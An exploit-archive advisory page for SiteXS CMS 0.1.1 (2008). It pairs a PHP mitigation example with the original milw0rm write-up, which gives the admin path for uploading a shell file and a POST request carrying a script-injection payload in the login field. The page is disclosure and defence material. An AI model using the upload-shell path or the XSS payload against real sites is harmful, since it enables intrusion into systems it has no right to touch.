Vendor: SiteXS CMS
By: CWH Underground
CVSS: 8.8 (HIGH)
Arbitrary File Upload and Remote XSS
CWE: 79
Product Name: SiteXS CMS
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:sitexs:sitexs_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities

The arbitrary file upload vulnerability allows malicious files to be uploaded directly to the web server. An attacker can exploit the XSS vulnerability by sending a POST request containing malicious JavaScript code to the target server.

Mitigation:

Ensure that the application is not vulnerable to XSS attacks by validating user input and encoding output.
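
One way to apply this mitigation, as an added example that is not SiteXS code: the `user` field from the PoC is validated and HTML-encoded, and the same approach is extended to the file upload issue. The function names, the username pattern, the extension allowlist and the storage directory are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not SiteXS code: function names, the username pattern,
// the extension allowlist and the storage directory are assumptions.

/** Input validation: accept only a conservative username alphabet. */
function valid_username(string $user): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $user) === 1;
}

/** Output encoding: neutralise markup before echoing a value into HTML. */
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Upload handling: allowlist the extension, discard the client-supplied
 * name, and store outside any directory the web server executes from.
 * Returns the stored path, or null when the upload is rejected.
 */
function store_upload(array $file, string $storageDir): ?string
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];   // assumed allowlist
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;                                   // script extensions are refused
    }
    // A random server-side name means the uploader cannot choose the stored path.
    $target = rtrim($storageDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Constructed input: the "user" value from the PoC request on this page.
$user = "admin'<script>alert(123)</script>";
if (!valid_username($user)) {
    // Even inside an error message, the value is encoded before it reaches the page.
    echo 'Invalid user name: ' . html($user) . PHP_EOL;
}
```

Where uploaded files must stay downloadable, serve them through a handler that sends them as attachments rather than from a directory in which the server runs scripts.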

Exploit-DB raw data:

===========================================================
  SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 21 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : SiteXS CMS
 VERSION     : 0.1.1
 DOWNLOAD    : http://downloads.sourceforge.net/sitexs
#####################################################

---Arbitrary File Upload Exploit---

	This vulnerability can upload malicious files directly to the web server.

[Login as user]

[+] Upload Path: http://[Target]/adm/?chid=4

[+] Shell Script: http://[Target]/download/[Evil File]


--- Remote XSS Exploit ---

-------------
 POC Exploit
-------------

[+] POST http://192.168.24.25/adm/ HTTP/1.0
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 44
[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5
[+]
[+] user=admin'<script>alert(123)</script>&pass=test

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-21]